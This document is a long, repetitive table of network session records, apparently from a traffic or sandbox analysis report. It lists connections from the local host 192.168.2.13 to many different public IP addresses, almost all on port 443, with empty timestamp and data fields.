                                        11060192.168.2.134064462.62.191.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11061192.168.2.135328618.60.17.44443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11062192.168.2.1340714128.241.1.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11063192.168.2.1339382183.18.45.184443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11064192.168.2.1346110143.222.162.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11065192.168.2.1351400177.182.1.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11066192.168.2.1348060157.114.37.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11067192.168.2.1335270174.157.193.221443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11068192.168.2.1341090155.153.201.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11069192.168.2.1336370196.114.137.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11070192.168.2.133965697.193.240.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11071192.168.2.134297248.104.219.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11072192.168.2.134128213.75.93.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11073192.168.2.135802494.54.232.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11074192.168.2.134210012.88.231.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11075192.168.2.1335940152.163.3.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11076192.168.2.134776425.102.154.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11077192.168.2.1337582175.87.239.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11078192.168.2.133576620.135.177.53443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11079192.168.2.136047834.185.157.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11080192.168.2.135149075.218.161.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11081192.168.2.134467444.86.208.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11082192.168.2.1344132110.131.0.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11083192.168.2.1355340113.156.190.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11084192.168.2.1340878209.141.210.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11085192.168.2.1353208217.1.150.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11086192.168.2.1351018123.181.191.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11087192.168.2.134572023.100.140.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11088192.168.2.135030632.33.245.221443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11089192.168.2.134428617.164.47.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11090192.168.2.13401004.234.10.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11091192.168.2.134507477.160.48.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11092192.168.2.1346616147.5.196.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11093192.168.2.13458181.242.192.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11094192.168.2.134027049.198.92.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11095192.168.2.135459034.202.27.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11096192.168.2.1337166146.201.222.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11097192.168.2.134818244.154.240.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11098192.168.2.1356324115.62.216.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11099192.168.2.135384440.156.7.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11100192.168.2.1351250198.117.89.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11101192.168.2.134906864.69.30.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11102192.168.2.1355604138.0.145.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11103192.168.2.1354176106.80.137.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11104192.168.2.1333358210.141.28.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11105192.168.2.1339766170.80.236.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11106192.168.2.1339640150.183.133.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11107192.168.2.133575689.213.234.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11108192.168.2.1345076106.56.9.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11109192.168.2.1360936184.110.242.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11110192.168.2.1337554149.219.150.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11111192.168.2.1338610116.97.193.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11112192.168.2.1352272210.179.189.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11113192.168.2.1353908183.25.201.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11114192.168.2.1343442158.206.196.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11115192.168.2.1336966124.111.154.228443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11116192.168.2.1348098200.96.54.25443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11117192.168.2.1356218177.119.26.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11118192.168.2.1358652211.130.251.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11119192.168.2.1356986212.110.73.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11120192.168.2.1359264200.75.2.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11121192.168.2.134004091.156.127.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11122192.168.2.1351452202.86.223.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11123192.168.2.13427605.191.141.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11124192.168.2.133992827.225.94.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11125192.168.2.1359882144.250.105.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11126192.168.2.133287094.16.121.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11127192.168.2.1342986157.255.143.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11128192.168.2.1339706106.42.43.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11129192.168.2.1350574180.231.106.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11130192.168.2.1342852121.45.130.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11131192.168.2.13493461.66.203.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11132192.168.2.1345262118.60.101.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11133192.168.2.1348308166.16.101.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11134192.168.2.135133042.179.230.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11135192.168.2.135778893.9.191.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11136192.168.2.1336450143.10.70.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11137192.168.2.1335020192.57.94.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11138192.168.2.135251040.189.1.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11139192.168.2.13534849.216.228.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11140192.168.2.1333178179.73.50.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11141192.168.2.1340624119.88.74.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11142192.168.2.1353670147.211.116.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11143192.168.2.1348648140.214.238.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11144192.168.2.1352642147.73.66.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11145192.168.2.133385695.93.153.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11146192.168.2.1346962145.231.235.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11147192.168.2.135381232.56.108.137443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11148192.168.2.1354442110.12.28.228443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11149192.168.2.1356868110.70.105.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11150192.168.2.1353360219.102.117.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11151192.168.2.135844889.93.247.53443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11152192.168.2.1347184187.8.117.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11153192.168.2.1339036153.172.197.232443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11154192.168.2.135728054.73.105.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11155192.168.2.13367364.25.181.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11156192.168.2.1338806121.224.242.232443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11157192.168.2.1357102177.110.115.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11158192.168.2.1358270129.111.214.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11159192.168.2.13468608.26.149.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11160192.168.2.1349992174.233.223.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11161192.168.2.1343682162.76.126.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11162192.168.2.1360206158.206.140.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11163192.168.2.1344874181.203.138.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11164192.168.2.1339674218.48.77.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11165192.168.2.134862031.8.12.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11166192.168.2.1359072222.199.27.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11167192.168.2.1345500165.45.253.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11168192.168.2.1340388175.212.215.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11169192.168.2.1356702196.166.241.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11170192.168.2.134996087.49.2.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11171192.168.2.1343576187.192.29.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11172192.168.2.1346970191.48.183.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11173192.168.2.1333652217.160.199.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11174192.168.2.1351306187.228.225.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11175192.168.2.135103663.39.127.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11176192.168.2.134921495.48.11.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11177192.168.2.135265265.81.6.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11178192.168.2.1357856158.69.203.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11179192.168.2.133761895.201.133.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11180192.168.2.1350884122.166.3.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11181192.168.2.1351476129.97.62.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11182192.168.2.133487243.67.137.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11183192.168.2.1352990115.100.29.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11184192.168.2.134196047.100.136.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11185192.168.2.135289488.93.87.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11186192.168.2.1355760159.32.197.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11187192.168.2.1349556219.178.98.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11188192.168.2.1360958202.27.31.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11189192.168.2.1353124109.8.249.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11190192.168.2.1336782204.136.61.47443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11191192.168.2.133673023.5.62.53443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11192192.168.2.134367880.189.45.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11193192.168.2.1345530151.247.15.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11194192.168.2.1353462191.66.139.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11195192.168.2.1357956109.42.132.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11196192.168.2.1332820104.247.216.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11197192.168.2.133693099.251.136.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11198192.168.2.1357254130.115.58.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11199192.168.2.135273489.124.247.94443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11200192.168.2.1356526143.34.215.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11201192.168.2.1354490107.46.67.87443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11202192.168.2.136050484.148.157.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11203192.168.2.133536638.157.156.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11204192.168.2.135152827.16.86.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11205192.168.2.133708893.80.161.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11206192.168.2.1339004202.18.157.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11207192.168.2.1345210174.128.155.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11208192.168.2.134365691.18.116.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11209192.168.2.1340232203.58.59.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11210192.168.2.1334634210.85.254.121443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11211192.168.2.1334768195.133.167.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11212192.168.2.1333182124.194.212.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11213192.168.2.134327274.74.1.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11214192.168.2.13353902.246.108.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11215192.168.2.134721882.213.54.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11216192.168.2.134788082.120.186.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11217192.168.2.133824237.95.195.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11218192.168.2.1342598139.168.9.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11219192.168.2.13478148.251.49.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11220192.168.2.1356896162.131.47.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11221192.168.2.1333358178.183.248.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11222192.168.2.133307460.224.11.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11223192.168.2.1349150167.100.212.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11224192.168.2.134194432.113.211.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11225192.168.2.1334430218.105.187.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11226192.168.2.134138623.5.124.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11227192.168.2.1354092152.139.80.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11228192.168.2.133460680.173.18.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11229192.168.2.133590452.182.36.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11230192.168.2.133925434.77.122.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11231192.168.2.1348304181.212.249.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11232192.168.2.1357526211.193.103.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11233192.168.2.133859061.244.161.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11234192.168.2.134294049.19.46.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11235192.168.2.135235288.49.88.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11236192.168.2.1340488137.48.71.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11237192.168.2.1350562193.50.225.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11238192.168.2.13365069.84.90.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11239192.168.2.1341506161.32.42.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11240192.168.2.1341182147.137.214.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11241192.168.2.1348320185.56.147.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11242192.168.2.1347680159.59.231.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11243192.168.2.1334586139.75.133.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11244192.168.2.1355916202.85.121.184443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11245192.168.2.1339818140.17.227.53443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11246192.168.2.135674434.191.237.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11247192.168.2.134129688.130.121.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11248192.168.2.134814617.240.137.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11249192.168.2.1356766220.166.115.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11250192.168.2.1345278136.222.48.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11251192.168.2.1353754210.138.106.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11252192.168.2.133564278.225.139.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11253192.168.2.134485875.139.76.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11254192.168.2.1355960139.26.227.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11255192.168.2.1342714104.109.60.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11256192.168.2.135330899.69.207.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11257192.168.2.1336308135.113.16.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11258192.168.2.135659292.202.27.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11259192.168.2.1335632139.78.56.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11260192.168.2.135157880.142.117.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11261192.168.2.1353112197.202.144.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11262192.168.2.134164423.177.59.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11263192.168.2.135690031.144.108.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11264192.168.2.134034276.253.119.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11265192.168.2.1354674150.22.212.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11266192.168.2.133643870.237.126.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11267192.168.2.1333062177.80.163.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11268192.168.2.1347184125.171.128.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11269192.168.2.135342274.14.123.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11270192.168.2.134344666.103.73.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11271192.168.2.1351424134.55.177.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11272192.168.2.134217254.250.50.1318080
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11273192.168.2.133459284.38.32.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11274192.168.2.1358804188.83.166.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11275192.168.2.135948839.106.131.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11276192.168.2.133604052.214.56.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11277192.168.2.134865848.116.177.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11278192.168.2.1348310197.64.0.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11279192.168.2.1333264201.238.37.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11280192.168.2.13492584.52.154.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11281192.168.2.1332974103.197.177.55443
                                        TimestampBytes transferredDirectionData


